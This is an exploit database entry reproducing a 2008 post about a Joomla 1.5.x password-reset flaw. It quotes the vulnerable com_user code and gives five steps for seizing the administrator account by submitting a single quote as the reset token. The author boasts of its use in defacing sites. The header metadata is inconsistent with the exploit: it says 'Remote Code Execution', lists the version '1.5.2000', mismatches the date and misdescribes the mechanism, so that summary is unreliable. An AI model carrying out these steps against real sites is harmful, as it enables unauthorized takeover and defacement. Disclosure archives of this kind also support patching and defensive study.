Joomla 1.5.x Remote Admin Password Change

vendor:

Joomla

by:

d3m0n

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Joomla

Affected Version From: 1.5.2000

Affected Version To: 1.5.26

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: All

2009

Joomla 1.5.x Remote Admin Password Change

A vulnerability in Joomla 1.5.x allows an attacker to remotely change the administrator password by exploiting a flaw in the 'confirmReset()' function of the 'com_user' component. The vulnerability is due to the fact that the 'confirmReset()' function does not properly validate the 'token' parameter when it is passed to the 'activation' parameter of the '#__users' table. This allows an attacker to set the administrator password to the value of the 'secret' parameter of the 'configuration.php' file.

Mitigation:

Upgrade to the latest version of Joomla 1.5.x

Source

Exploit-DB raw data:

#####################################################################################
####                     Joomla 1.5.x Remote Admin Password Change               ####
#####################################################################################
#                                                                                   #
# Author: d3m0n (d3m0n@o2.pl)                                                       #
# Greets: GregStar, gorion, d3d!k                                                   #
#                                                                                   #
# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff    #
#                                                                                   #
#####################################################################################



File : /components/com_user/controller.php

#####################################################################################
Line : 379-399
 
	function confirmreset()
	{
		// Check for request forgeries
		JRequest::checkToken() or die( 'Invalid Token' );

		// Get the input
		$token = JRequest::getVar('token', null, 'post', 'alnum');              < --- {1} 
                  
		// Get the model
		$model = &$this->getModel('Reset');

		// Verify the token
		if ($model->confirmReset($token) === false)   < --- {2}
		{
			$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
			$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
			return false;
		}

		$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
	}
	
#####################################################################################
	
File : /components/com_user/models/reset.php

Line: 111-130 	
	
	
	
	function confirmReset($token)
	{
		global $mainframe;

		$db	= &JFactory::getDBO();
		$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));  < ---- {3} 

		// Verify the token
		if (!($id = $db->loadResult()))
		{
			$this->setError(JText::_('INVALID_TOKEN'));
			return false;
		}

		// Push the token and user id into the session
		$mainframe->setUserState($this->_namespace.'token',	$token);
		$mainframe->setUserState($this->_namespace.'id',	$id);

		return true;
	}
#####################################################################################



{1} - Replace ' with empty char
{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "


Example :


1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

2. Write into field "token" char ' and Click OK.

3. Write new password for admin

4. Go to url : target.com/administrator/

5. Login admin with new password

# milw0rm.com [2008-08-12]